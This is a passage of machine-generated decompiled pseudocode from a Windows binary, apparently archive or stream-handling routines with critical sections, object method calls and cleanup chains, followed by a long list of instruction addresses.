																			E004431F3( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																			goto L119;
																		}
																	}
																	__eflags =  *_t1160 - _t928;
																	if( *_t1160 != _t928) {
																		goto L101;
																	}
																	goto L99;
																}
																 *(_t1186 - 0x38) =  *(_t1186 - 0x38) + 1;
																goto L122;
															}
															__eflags =  *(_t1186 - 0x40) - _t669;
															if( *(_t1186 - 0x40) >= _t669) {
																goto L95;
															}
															 *(_t1186 - 0x40) =  *(_t1186 - 0x40) + 1;
															_t1177 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + ( *(_t1186 - 0x40) << 2)));
															__eflags =  *_t1177 - _t928;
															if(__eflags == 0) {
																goto L122;
															}
															E0043F39F(_t1186 - 0x1d4, __eflags);
															__eflags =  *((intOrPtr*)(_t1177 + 1)) - _t928;
															 *(_t1186 - 4) = 0x12;
															if( *((intOrPtr*)(_t1177 + 1)) == _t928) {
																_t1161 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1177 + 8) * 4));
																E00443797(_t1186 - 0x1d4, _t1161);
																 *((intOrPtr*)(_t1186 - 0x144)) =  *((intOrPtr*)(_t1161 + 0x90));
																 *(_t1186 - 0x140) =  *((intOrPtr*)(_t1161 + 0x94));
																_push(_t1186 - 0x1d4);
																__eflags = E0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																if(__eflags != 0) {
																	 *(_t1186 - 4) = 0xa;
																	E0043CD47(_t1186 - 0x1d4, __eflags);
																	 *(_t1186 - 4) = 9;
																	E00408604(_t1186 - 0x7c);
																	 *(_t1186 - 4) = 8;
																	E00408604(_t1186 - 0xa4);
																	 *(_t1186 - 4) = 7;
																	E00442DE5(_t1186 - 0x90);
																	 *(_t1186 - 4) = 6;
																	E00442E79(_t1186 - 0xbc);
																	 *(_t1186 - 4) = 5;
																	E0044296D(_t1186 - 0xe4);
																	 *(_t1186 - 4) = 4;
																	E0044395A(_t1186 - 0x13c, __eflags);
																	_t723 =  *((intOrPtr*)(_t1186 - 0x28));
																	 *(_t1186 - 4) = 3;
																	__eflags = _t723 - _t928;
																	if(_t723 != _t928) {
																		 *((intOrPtr*)( *_t723 + 8))(_t723);
																	}
																	 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																	 *(_t1186 - 4) = 0x13;
																	E0040862D();
																	 *(_t1186 - 4) = 2;
																	E00408604(_t1186 - 0x5c);
																	_t1176 = 0x80004001;
																	goto L148;
																}
																__eflags = E00440593(_t1186 - 0x1d4);
																if(__eflags != 0) {
																	L94:
																	 *(_t1186 - 4) = 0xa;
																	_t985 = _t1186 - 0x1d4;
																	goto L121;
																}
																L81:
																 *(_t1186 - 0x34) = _t928;
																_t1163 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)) + 0x3c;
																 *(_t1186 - 0x68) = _t1163;
																EnterCriticalSection(_t1163);
																_t729 =  *((intOrPtr*)(_t1186 + 0x1c));
																_t1146 = _t1186 - 0x34;
																 *(_t1186 - 4) = 0x15;
																_t730 =  *((intOrPtr*)( *_t729 + 0x1c))(_t729,  *((intOrPtr*)(_t1177 + 0xc)), _t1186 - 0x34);
																__eflags = _t730 - 1;
																 *(_t1186 - 0x1c) = _t730;
																if(_t730 != 1) {
																	_t1176 =  *(_t1186 - 0x1c);
																	__eflags = _t1176 - _t928;
																	if(_t1176 != _t928) {
																		LeaveCriticalSection(_t1163);
																		_t731 =  *(_t1186 - 0x34);
																		 *(_t1186 - 4) = 0x12;
																		__eflags = _t731 - _t928;
																		if(__eflags != 0) {
																			 *((intOrPtr*)( *_t731 + 8))(_t731);
																		}
																		 *(_t1186 - 4) = 0xa;
																		E0043CD47(_t1186 - 0x1d4, __eflags);
																		 *(_t1186 - 4) = 9;
																		E00408604(_t1186 - 0x7c);
																		 *(_t1186 - 4) = 8;
																		E00408604(_t1186 - 0xa4);
																		 *(_t1186 - 4) = 7;
																		E00442DE5(_t1186 - 0x90);
																		 *(_t1186 - 4) = 6;
																		E00442E79(_t1186 - 0xbc);
																		 *(_t1186 - 4) = 5;
																		E0044296D(_t1186 - 0xe4);
																		 *(_t1186 - 4) = 4;
																		E0044395A(_t1186 - 0x13c, __eflags);
																		_t739 =  *((intOrPtr*)(_t1186 - 0x28));
																		 *(_t1186 - 4) = 3;
																		__eflags = _t739 - _t928;
																		if(_t739 != _t928) {
																			 *((intOrPtr*)( *_t739 + 8))(_t739);
																		}
																		 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																		 *(_t1186 - 4) = 0x17;
																		L134:
																		E0040862D();
																		 *(_t1186 - 4) = 2;
																		E00408604(_t1186 - 0x5c);
																		goto L148;
																	}
																	_t744 =  *((intOrPtr*)(_t1186 + 0x1c));
																	_t1176 =  *((intOrPtr*)( *_t744 + 0x20))(_t744, _t928);
																	__eflags = _t1176 - _t928;
																	if(_t1176 != _t928) {
																		LeaveCriticalSection(_t1163);
																		_t746 =  *(_t1186 - 0x34);
																		 *(_t1186 - 4) = 0x12;
																		__eflags = _t746 - _t928;
																		if(__eflags != 0) {
																			 *((intOrPtr*)( *_t746 + 8))(_t746);
																		}
																		 *(_t1186 - 4) = 0xa;
																		E0043CD47(_t1186 - 0x1d4, __eflags);
																		 *(_t1186 - 4) = 9;
																		E00408604(_t1186 - 0x7c);
																		 *(_t1186 - 4) = 8;
																		E00408604(_t1186 - 0xa4);
																		 *(_t1186 - 4) = 7;
																		E00442DE5(_t1186 - 0x90);
																		 *(_t1186 - 4) = 6;
																		E00442E79(_t1186 - 0xbc);
																		 *(_t1186 - 4) = 5;
																		E0044296D(_t1186 - 0xe4);
																		 *(_t1186 - 4) = 4;
																		E0044395A(_t1186 - 0x13c, __eflags);
																		_t754 =  *((intOrPtr*)(_t1186 - 0x28));
																		 *(_t1186 - 4) = 3;
																		__eflags = _t754 - _t928;
																		if(_t754 != _t928) {
																			 *((intOrPtr*)( *_t754 + 8))(_t754);
																		}
																		goto L147;
																	}
																	 *(_t1186 - 4) = 0x14;
																	LeaveCriticalSection(_t1163);
																	_t1164 = 0;
																	__eflags =  *(_t1186 - 0x20) - _t928;
																	if( *(_t1186 - 0x20) <= _t928) {
																		L93:
																		 *(_t1186 - 4) = 0x12;
																		E0043361B(_t1186 - 0x34);
																		goto L94;
																	}
																	_t758 =  *((intOrPtr*)(_t1186 - 0x84));
																	while(1) {
																		_t1182 =  *_t758;
																		__eflags =  *(_t1182 + 0xb8) - _t928;
																		if( *(_t1182 + 0xb8) != _t928) {
																			break;
																		}
																		_t1164 = _t1164 + 1;
																		_t758 = _t758 + 4;
																		__eflags = _t1164 -  *(_t1186 - 0x20);
																		if(_t1164 <  *(_t1186 - 0x20)) {
																			continue;
																		}
																		goto L93;
																	}
																	 *(_t1182 + 0xb8) = _t928;
																	_t341 = _t1182 + 0x20; // 0x20
																	E0040C9B4(_t341,  *(_t1186 - 0x34));
																	L00437D6C(_t1186 - 0x34);
																	E0040EFF1( *((intOrPtr*)(_t1182 + 0x18)));
																	E0040F2EB( *((intOrPtr*)( *((intOrPtr*)(_t1182 + 0x10)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t1182 + 0x10)) + 0xc)));
																	_t347 = _t1182 + 4; // 0x4
																	E00467B10(_t347);
																	_t766 =  *(_t1186 - 0x40) - 1;
																	__eflags = _t766;
																	 *(_t1182 + 0xbc) = _t766;
																	E00415C6D(_t1186 - 0xa4,  *((intOrPtr*)(_t1182 + 8)));
																	E00415C6D(_t1186 - 0x7c, _t1164);
																	goto L93;
																}
																asm("adc ecx, ebx");
																 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t1177 + 0x18)) + 0x1a;
																asm("adc [ebp-0x14], ecx");
																E00441083( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)),  *(_t1186 - 0x18),  *(_t1186 - 0x14));
																_t773 =  *((intOrPtr*)(_t1186 + 0x1c));
																_t1176 =  *((intOrPtr*)( *_t773 + 0x20))(_t773, _t928);
																__eflags = _t1176 - _t928;
																if(_t1176 != _t928) {
																	LeaveCriticalSection(_t1163);
																	_t775 =  *(_t1186 - 0x34);
																	 *(_t1186 - 4) = 0x12;
																	__eflags = _t775 - _t928;
																	if(__eflags != 0) {
																		 *((intOrPtr*)( *_t775 + 8))(_t775);
																	}
																	 *(_t1186 - 4) = 0xa;
																	E0043CD47(_t1186 - 0x1d4, __eflags);
																	 *(_t1186 - 4) = 9;
																	E00408604(_t1186 - 0x7c);
																	 *(_t1186 - 4) = 8;
																	E00408604(_t1186 - 0xa4);
																	 *(_t1186 - 4) = 7;
																	E00442DE5(_t1186 - 0x90);
																	 *(_t1186 - 4) = 6;
																	E00442E79(_t1186 - 0xbc);
																	 *(_t1186 - 4) = 5;
																	E0044296D(_t1186 - 0xe4);
																	 *(_t1186 - 4) = 4;
																	E0044395A(_t1186 - 0x13c, __eflags);
																	_t783 =  *((intOrPtr*)(_t1186 - 0x28));
																	 *(_t1186 - 4) = 3;
																	__eflags = _t783 - _t928;
																	if(_t783 != _t928) {
																		 *((intOrPtr*)( *_t783 + 8))(_t783);
																	}
																	 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																	 *(_t1186 - 4) = 0x16;
																	goto L134;
																}
																 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0xac)) +  *(_t1186 - 0x40) * 4 - 4)) + 0x41)) = 1;
																LeaveCriticalSection(_t1163);
																_t788 =  *(_t1186 - 0x34);
																 *(_t1186 - 4) = 0x12;
																__eflags = _t788 - _t928;
																if(__eflags != 0) {
																	 *((intOrPtr*)( *_t788 + 8))(_t788);
																}
																goto L94;
															}
															__eflags =  *((intOrPtr*)(_t1177 + 2)) - _t928;
															if(__eflags == 0) {
																goto L81;
															}
															goto L94;
															L122:
															_t669 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 8));
															__eflags =  *(_t1186 - 0x38) - _t669;
														} while ( *(_t1186 - 0x38) < _t669);
														goto L123;
													} else {
														goto L53;
													}
													while(1) {
														L53:
														_t1183 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) + _t1159 * 4));
														_t845 = E00442D4F(_t1183);
														__eflags = _t845 - _t928;
														 *(_t1186 - 0x2c) = _t845;
														if(_t845 != _t928) {
															break;
														}
														_push(0x58);
														_t856 = E004079F2();
														 *(_t1186 - 0x2c) = _t856;
														__eflags = _t856 - _t928;
														 *(_t1186 - 4) = 0xf;
														if(_t856 == _t928) {
															_t857 = 0;
															__eflags = 0;
														} else {
															_t857 = E00442A33(_t856, _t1186 - 0xe4);
														}
														 *(_t1186 - 4) = 0xa;
														 *((intOrPtr*)(_t1183 + 0x18)) = _t857;
														_t858 = E004429EB(_t857);
														__eflags = _t858 - _t928;
														 *(_t1186 - 0x2c) = _t858;
														if(_t858 != _t928) {
															 *(_t1186 - 4) = 9;
															E00408604(_t1186 - 0x7c);
															 *(_t1186 - 4) = 8;
															E00408604(_t1186 - 0xa4);
															 *(_t1186 - 4) = 7;
															E00442DE5(_t1186 - 0x90);
															 *(_t1186 - 4) = 6;
															E00442E79(_t1186 - 0xbc);
															 *(_t1186 - 4) = 5;
															E0044296D(_t1186 - 0xe4);
															 *(_t1186 - 4) = 4;
															E0044395A(_t1186 - 0x13c, __eflags);
															_t865 =  *((intOrPtr*)(_t1186 - 0x28));
															 *(_t1186 - 4) = 3;
															__eflags = _t865 - _t928;
															if(_t865 != _t928) {
																 *((intOrPtr*)( *_t865 + 8))(_t865);
															}
															 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
															 *(_t1186 - 4) = 0x10;
															E0040862D();
															 *(_t1186 - 4) = 2;
															E00408604(_t1186 - 0x5c);
															_t928 =  *(_t1186 - 0x2c);
															goto L124;
														} else {
															E0040C9B4(_t1183 + 0x1c,  *((intOrPtr*)(_t1183 + 0x18)));
															 *((char*)(_t1183 + 0xb8)) = 1;
															_push(0x10);
															_t870 = E004079F2();
															__eflags = _t870 - _t928;
															if(_t870 == _t928) {
																_t870 = 0;
																__eflags = 0;
															} else {
																 *(_t870 + 4) = _t928;
																 *_t870 = 0x47b88c;
															}
															 *((intOrPtr*)(_t1183 + 0x10)) = _t870;
															E0040C9B4(_t1183 + 0x14, _t870);
															_t872 =  *((intOrPtr*)(_t1183 + 0x10));
															_t1146 = E00442DD7;
															 *((intOrPtr*)(_t872 + 8)) = _t1186 - 0x13c;
															 *(_t872 + 0xc) = _t1159;
															_t1173 = E00467AD0(_t1183, E00442DD7, _t1183);
															__eflags = _t1173 - _t928;
															if(_t1173 != _t928) {
																 *(_t1186 - 4) = 9;
																E00408604(_t1186 - 0x7c);
																 *(_t1186 - 4) = 8;
																E00408604(_t1186 - 0xa4);
																 *(_t1186 - 4) = 7;
																E00442DE5(_t1186 - 0x90);
																 *(_t1186 - 4) = 6;
																E00442E79(_t1186 - 0xbc);
																 *(_t1186 - 4) = 5;
																E0044296D(_t1186 - 0xe4);
																 *(_t1186 - 4) = 4;
																E0044395A(_t1186 - 0x13c, __eflags);
																_t880 =  *((intOrPtr*)(_t1186 - 0x28));
																 *(_t1186 - 4) = 3;
																__eflags = _t880 - _t928;
																if(_t880 != _t928) {
																	 *((intOrPtr*)( *_t880 + 8))(_t880);
																}
																 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																 *(_t1186 - 4) = 0x11;
																goto L47;
															} else {
																_t1159 = _t1159 + 1;
																__eflags = _t1159 -  *(_t1186 - 0x20);
																if(_t1159 <  *(_t1186 - 0x20)) {
																	continue;
																}
																goto L63;
															}
														}
													}
													 *(_t1186 - 4) = 9;
													E00408604(_t1186 - 0x7c);
													 *(_t1186 - 4) = 8;
													E00408604(_t1186 - 0xa4);
													 *(_t1186 - 4) = 7;
													E00442DE5(_t1186 - 0x90);
													 *(_t1186 - 4) = 6;
													E00442E79(_t1186 - 0xbc);
													 *(_t1186 - 4) = 5;
													E0044296D(_t1186 - 0xe4);
													 *(_t1186 - 4) = 4;
													E0044395A(_t1186 - 0x13c, __eflags);
													_t852 =  *((intOrPtr*)(_t1186 - 0x28));
													 *(_t1186 - 4) = 3;
													__eflags = _t852 - _t928;
													if(_t852 != _t928) {
														 *((intOrPtr*)( *_t852 + 8))(_t852);
													}
													 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
													 *(_t1186 - 4) = 0xe;
													E0040862D();
													 *(_t1186 - 4) = 2;
													E00408604(_t1186 - 0x5c);
													_t928 =  *(_t1186 - 0x2c);
													goto L124;
												} else {
													goto L51;
												}
												do {
													L51:
													_push(_t1186 - 0x2ec);
													_push(E00442CFF(_t1186 - 0x1fc));
													 *(_t1186 - 4) = 0xd;
													E00443AB1(_t1186 - 0x90);
													 *(_t1186 - 4) = 0xa;
													E004439AD(_t1186 - 0x1fc);
													_t1175 = _t1175 - 1;
													__eflags = _t1175;
												} while (_t1175 != 0);
												goto L52;
											} else {
												goto L49;
											}
											do {
												L49:
												E004429C6(_t1186 - 0x334);
												 *(_t1186 - 0x2f4) = _t928;
												 *(_t1186 - 0x2f3) = _t928;
												_push(_t1186 - 0x334);
												 *(_t1186 - 4) = 0xc;
												L00443BAF(_t1186 - 0xb8);
												 *(_t1186 - 4) = 0xa;
												E00408604(_t1186 - 0x334);
												_t1158 = _t1158 + 1;
												__eflags = _t1158 -  *((intOrPtr*)(_t1174 + 8));
											} while (_t1158 <  *((intOrPtr*)(_t1174 + 8)));
											goto L50;
										} else {
											 *(_t1186 - 4) = 9;
											E00408604(_t1186 - 0x7c);
											 *(_t1186 - 4) = 8;
											E00408604(_t1186 - 0xa4);
											 *(_t1186 - 4) = 7;
											E00442DE5(_t1186 - 0x90);
											 *(_t1186 - 4) = 6;
											E00442E79(_t1186 - 0xbc);
											 *(_t1186 - 4) = 5;
											E0044296D(_t1186 - 0xe4);
											 *(_t1186 - 4) = 4;
											E0044395A(_t1186 - 0x13c, __eflags);
											_t898 =  *((intOrPtr*)(_t1186 - 0x28));
											 *(_t1186 - 4) = 3;
											__eflags = _t898 - _t928;
											if(_t898 != _t928) {
												 *((intOrPtr*)( *_t898 + 8))(_t898);
											}
											 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
											 *(_t1186 - 4) = 0xb;
											L47:
											E0040862D();
											 *(_t1186 - 4) = 2;
											E00408604(_t1186 - 0x5c);
											_t928 = _t1173;
											L124:
											 *(_t1186 - 4) = 1;
											E0043E0CB(_t1186 - 0x2ec);
											 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
											E00442D78(_t1186 - 0x3ac);
											_t650 = _t928;
											L125:
											 *[fs:0x0] =  *((intOrPtr*)(_t1186 - 0xc));
											return _t650;
										}
									}
									goto L37;
								}
								_t904 = E0046B300( *((intOrPtr*)(_t1186 - 0x48)),  *(_t1186 - 0x44),  *((intOrPtr*)(_t1186 - 0x30)),  *(_t1186 - 0x2c));
								_t1134 =  *(_t1170 + 0x34);
								if( *(_t1170 + 0x34) == _t928) {
									_t1134 = _t1155;
								}
								_t905 = E0046B300(_t904, _t1146, _t1134, _t928);
								_t1205 = _t1146 - _t928;
								_t1135 = 0x20;
								if(_t1205 > 0 || _t1205 >= 0 && _t905 >= _t1135) {
									_t1155 = 1;
								} else {
									_t1135 = _t905;
									_t1155 = 1;
									if(_t905 < _t1155) {
										_t1135 = _t1155;
									}
								}
								_t906 =  *(_t1186 - 0x20);
								_t907 = _t906 / _t1135;
								_t1146 = _t906 % _t1135;
								 *(_t1186 - 0x2ac) = _t1135;
								 *(_t1186 - 0x20) = _t907;
								if(_t907 > _t1155) {
									goto L36;
								} else {
									 *(_t1186 - 0xd) = _t928;
									goto L33;
								}
							}
							if( *((intOrPtr*)(_t1170 + 0x44)) != _t928) {
								goto L36;
							}
							 *(_t1186 - 0xd) = _t928;
							goto L21;
						}
					}
					E004438A5(_t1186 - 0x2ec, _t1170);
					 *(_t1186 - 0xd) = 1;
					if( *(_t1186 - 0x20) > _t1155) {
						goto L13;
					}
					goto L12;
				} else {
					goto L1;
				}
				do {
					L1:
					_t911 =  *((intOrPtr*)( *((intOrPtr*)(_t931 + 0xc)) + _t1154 * 4));
					if( *_t911 == _t928) {
						_t1184 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t911 + 8) * 4));
						_push(_t1184);
						E0043CBF4(_t1186 - 0x1d4, __eflags);
						 *((intOrPtr*)(_t1186 - 0x144)) =  *((intOrPtr*)(_t1184 + 0x90));
						 *(_t1186 - 0x140) =  *((intOrPtr*)(_t1184 + 0x94));
						_push(_t1186 - 0x1d4);
						 *(_t1186 - 4) = _t928;
						__eflags = E0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
						if(__eflags != 0) {
							 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
							E0043CD47(_t1186 - 0x1d4, __eflags);
							_t650 = 0x80004001;
							goto L125;
						} else {
							_t1146 = ( *(_t1186 - 0x140) & 0x0000ffff) +  *((intOrPtr*)(_t1186 - 0x144));
							asm("adc ecx, esi");
							asm("adc ecx, [ebp-0x1c0]");
							 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + (( *(_t1186 - 0x1d2) >> 0x00000003 & 0x00000001) << 4) + _t1146 +  *((intOrPtr*)(_t1186 - 0x1c4));
							asm("adc [ebp-0x14], ecx");
							_t43 = _t1186 - 4;
							 *_t43 =  *(_t1186 - 4) | 0xffffffff;
							__eflags =  *_t43;
							E0043CD47(_t1186 - 0x1d4, __eflags);
							goto L5;
						}
					} else {
						_t1146 =  *(_t911 + 0x1c);
						 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t911 + 0x18));
						asm("adc [ebp-0x14], edx");
						 *((intOrPtr*)(_t1186 - 0x48)) =  *((intOrPtr*)(_t1186 - 0x48)) +  *((intOrPtr*)(_t911 + 0x18));
						asm("adc [ebp-0x44], eax");
						 *((intOrPtr*)(_t1186 - 0x30)) =  *((intOrPtr*)(_t1186 - 0x30)) + 1;
						asm("adc [ebp-0x2c], ebx");
					}
					L5:
					 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + 0x44;
					_t931 =  *((intOrPtr*)(_t1186 + 0x10));
					asm("adc [ebp-0x14], ebx");
					_t1154 = _t1154 + 1;
				} while (_t1154 <  *((intOrPtr*)(_t931 + 8)));
				goto L6;
			}



















































































                                                                      0x00441925
                                                                      0x0044192a
                                                                      0x0044192f
                                                                      0x00441935
                                                                      0x00441939
                                                                      0x0044193e
                                                                      0x00441943
                                                                      0x00441947
                                                                      0x0044194a
                                                                      0x0044194d
                                                                      0x00441950
                                                                      0x00441953
                                                                      0x00441956
                                                                      0x00441959
                                                                      0x0044195c
                                                                      0x00441a35
                                                                      0x00441a35
                                                                      0x00441a38
                                                                      0x00441a3a
                                                                      0x00441a3f
                                                                      0x00441a42
                                                                      0x00441a42
                                                                      0x00441a47
                                                                      0x00441a4a
                                                                      0x00441a4b
                                                                      0x00441a50
                                                                      0x00441a5a
                                                                      0x00441a5d
                                                                      0x00441a67
                                                                      0x00441a6c
                                                                      0x00441a76
                                                                      0x00441a79
                                                                      0x00441a7c
                                                                      0x00441a7f
                                                                      0x00441a82
                                                                      0x00441a84
                                                                      0x00441a84
                                                                      0x00441a8d
                                                                      0x00441a94
                                                                      0x00441a98
                                                                      0x00441aaf
                                                                      0x00441aaf
                                                                      0x00441ab2
                                                                      0x00441ab2
                                                                      0x00441ab5
                                                                      0x00441abe
                                                                      0x00441abe
                                                                      0x00441ac4
                                                                      0x00441b81
                                                                      0x00441b81
                                                                      0x00441b8a
                                                                      0x00441b8d
                                                                      0x00441b8e
                                                                      0x00441b91
                                                                      0x00441b94
                                                                      0x00441b9c
                                                                      0x00000000
                                                                      0x00441aca
                                                                      0x00441acd
                                                                      0x00441ad1
                                                                      0x00441ad4
                                                                      0x00441ae2
                                                                      0x00441ae4
                                                                      0x00441b56
                                                                      0x00441b5a
                                                                      0x00441b5c
                                                                      0x00441b67
                                                                      0x00441b6a
                                                                      0x00441b6a
                                                                      0x00441b6c
                                                                      0x00441b74
                                                                      0x00441b77
                                                                      0x00441b79
                                                                      0x00441b79
                                                                      0x00441b77
                                                                      0x00441b7c
                                                                      0x00441b7f
                                                                      0x00441ba6
                                                                      0x00441bb0
                                                                      0x00441bb3
                                                                      0x00441bb5
                                                                      0x00441bb9
                                                                      0x00441bbe
                                                                      0x00441bc1
                                                                      0x00441bd3
                                                                      0x00441bd3
                                                                      0x00441bc3
                                                                      0x00441bc3
                                                                      0x00441bc6
                                                                      0x00441bc9
                                                                      0x00441bcf
                                                                      0x00441bcf
                                                                      0x00441bd5
                                                                      0x00441bd7
                                                                      0x00441bda
                                                                      0x00441bdd
                                                                      0x00441be2
                                                                      0x00441be2
                                                                      0x00441be5
                                                                      0x00441be9
                                                                      0x00441bec
                                                                      0x00441bf0
                                                                      0x00441bfb
                                                                      0x00441c00
                                                                      0x00441c09
                                                                      0x00441c0d
                                                                      0x00441c10
                                                                      0x00441c20
                                                                      0x00441c2b
                                                                      0x00441c30
                                                                      0x00441c42
                                                                      0x00441c46
                                                                      0x00441c4c
                                                                      0x00441c57
                                                                      0x00441c5b
                                                                      0x00441c68
                                                                      0x00441c6c
                                                                      0x00441c71
                                                                      0x00441c80
                                                                      0x00441c84
                                                                      0x00441c89
                                                                      0x00441c9e
                                                                      0x00441ca7
                                                                      0x00441ca9
                                                                      0x00441cab
                                                                      0x00441d3b
                                                                      0x00441d3e
                                                                      0x00441d40
                                                                      0x00441d43
                                                                      0x00441d87
                                                                      0x00441d87
                                                                      0x00441d8a
                                                                      0x00441d8c
                                                                      0x00441dc2
                                                                      0x00441dc2
                                                                      0x00441dc4
                                                                      0x00441dc7
                                                                      0x00441e8d
                                                                      0x00441e90
                                                                      0x00441e94
                                                                      0x00441e97
                                                                      0x00441e9a
                                                                      0x00441e9d
                                                                      0x00441e9f
                                                                      0x00442578
                                                                      0x00442582
                                                                      0x0044258a
                                                                      0x0044258e
                                                                      0x00442599
                                                                      0x0044259d
                                                                      0x004425a8
                                                                      0x004425ac
                                                                      0x004425b7
                                                                      0x004425bb
                                                                      0x004425c6
                                                                      0x004425ca
                                                                      0x004425d5
                                                                      0x004425d9
                                                                      0x004425e1
                                                                      0x004425e5
                                                                      0x004425ed
                                                                      0x004425f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441ea5
                                                                      0x00441ea5
                                                                      0x00441ea8
                                                                      0x00441eab
                                                                      0x00442245
                                                                      0x0044224e
                                                                      0x00442251
                                                                      0x00442254
                                                                      0x00442257
                                                                      0x0044225a
                                                                      0x0044226a
                                                                      0x00442273
                                                                      0x00442278
                                                                      0x0044227b
                                                                      0x0044227f
                                                                      0x00442285
                                                                      0x00442297
                                                                      0x004422a5
                                                                      0x004422ab
                                                                      0x004422ad
                                                                      0x004428ae
                                                                      0x004428b7
                                                                      0x004428bd
                                                                      0x004428c1
                                                                      0x004428c9
                                                                      0x004428cd
                                                                      0x004428d8
                                                                      0x004428dc
                                                                      0x004428e7
                                                                      0x004428eb
                                                                      0x004428f6
                                                                      0x004428fa
                                                                      0x00442905
                                                                      0x00442909
                                                                      0x00442914
                                                                      0x00442918
                                                                      0x00442920
                                                                      0x00442924
                                                                      0x00442929
                                                                      0x0044292c
                                                                      0x00442930
                                                                      0x00442935
                                                                      0x0044293b
                                                                      0x0044293f
                                                                      0x00442944
                                                                      0x0044294e
                                                                      0x00442953
                                                                      0x00000000
                                                                      0x00442953
                                                                      0x004422b3
                                                                      0x004422b5
                                                                      0x00442511
                                                                      0x00442523
                                                                      0x00442528
                                                                      0x0044252a
                                                                      0x004428b5
                                                                      0x004428b5
                                                                      0x00000000
                                                                      0x004428b5
                                                                      0x00442530
                                                                      0x00442539
                                                                      0x0044253a
                                                                      0x0044253f
                                                                      0x00442546
                                                                      0x00442552
                                                                      0x00442557
                                                                      0x00442557
                                                                      0x00442557
                                                                      0x0044255a
                                                                      0x0044255a
                                                                      0x0044255e
                                                                      0x00442564
                                                                      0x00442564
                                                                      0x00000000
                                                                      0x00442564
                                                                      0x004422bb
                                                                      0x004422bb
                                                                      0x004422be
                                                                      0x004422cb
                                                                      0x004422c0
                                                                      0x004422c0
                                                                      0x004422c0
                                                                      0x004422d0
                                                                      0x004422d2
                                                                      0x004422ef
                                                                      0x004422f2
                                                                      0x00442329
                                                                      0x004422f4
                                                                      0x004422f7
                                                                      0x004422fd
                                                                      0x00442306
                                                                      0x0044230a
                                                                      0x00442322
                                                                      0x00442322
                                                                      0x00442335
                                                                      0x00442338
                                                                      0x0044233b
                                                                      0x0044233e
                                                                      0x004423c9
                                                                      0x004423cc
                                                                      0x004423cf
                                                                      0x004423d2
                                                                      0x004423d4
                                                                      0x004423dd
                                                                      0x004423de
                                                                      0x004423e2
                                                                      0x004423ed
                                                                      0x004423f8
                                                                      0x004423fc
                                                                      0x00442404
                                                                      0x00442408
                                                                      0x00442408
                                                                      0x0044241c
                                                                      0x00442425
                                                                      0x00442431
                                                                      0x00442437
                                                                      0x0044243c
                                                                      0x00442442
                                                                      0x00442449
                                                                      0x0044244b
                                                                      0x00000000
                                                                      0x00442451
                                                                      0x00442459
                                                                      0x00442469
                                                                      0x0044246e
                                                                      0x00442471
                                                                      0x004424e8
                                                                      0x004424ef
                                                                      0x004424f2
                                                                      0x00442505
                                                                      0x00442506
                                                                      0x00442506
                                                                      0x00442508
                                                                      0x00000000
                                                                      0x00442508
                                                                      0x00442476
                                                                      0x0044247b
                                                                      0x0044247d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00442486
                                                                      0x0044248c
                                                                      0x00442497
                                                                      0x004424a2
                                                                      0x004424ac
                                                                      0x004424b3
                                                                      0x004424b8
                                                                      0x004424c6
                                                                      0x004424d4
                                                                      0x004424d5
                                                                      0x00000000
                                                                      0x004424d5
                                                                      0x00442340
                                                                      0x00442340
                                                                      0x00442349
                                                                      0x0044234a
                                                                      0x0044234e
                                                                      0x0044235f
                                                                      0x0044236d
                                                                      0x00442371
                                                                      0x00442378
                                                                      0x00442388
                                                                      0x0044238a
                                                                      0x00442398
                                                                      0x00442399
                                                                      0x004423a8
                                                                      0x004423b0
                                                                      0x004423b4
                                                                      0x00000000
                                                                      0x004423b4
                                                                      0x004422d4
                                                                      0x004422d4
                                                                      0x004422e2
                                                                      0x00000000
                                                                      0x004422e2
                                                                      0x004422d2
                                                                      0x00442281
                                                                      0x00442283
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00442283
                                                                      0x0044225c
                                                                      0x00000000
                                                                      0x0044225c
                                                                      0x00441eb1
                                                                      0x00441eb4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441ec6
                                                                      0x00441ec9
                                                                      0x00441ecc
                                                                      0x00441ece
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441eda
                                                                      0x00441edf
                                                                      0x00441ee2
                                                                      0x00441ee6
                                                                      0x00442099
                                                                      0x004420a3
                                                                      0x004420b1
                                                                      0x004420be
                                                                      0x004420cb
                                                                      0x004420d1
                                                                      0x004420d3
                                                                      0x0044262d
                                                                      0x00442631
                                                                      0x00442639
                                                                      0x0044263d
                                                                      0x00442648
                                                                      0x0044264c
                                                                      0x00442657
                                                                      0x0044265b
                                                                      0x00442666
                                                                      0x0044266a
                                                                      0x00442675
                                                                      0x00442679
                                                                      0x00442684
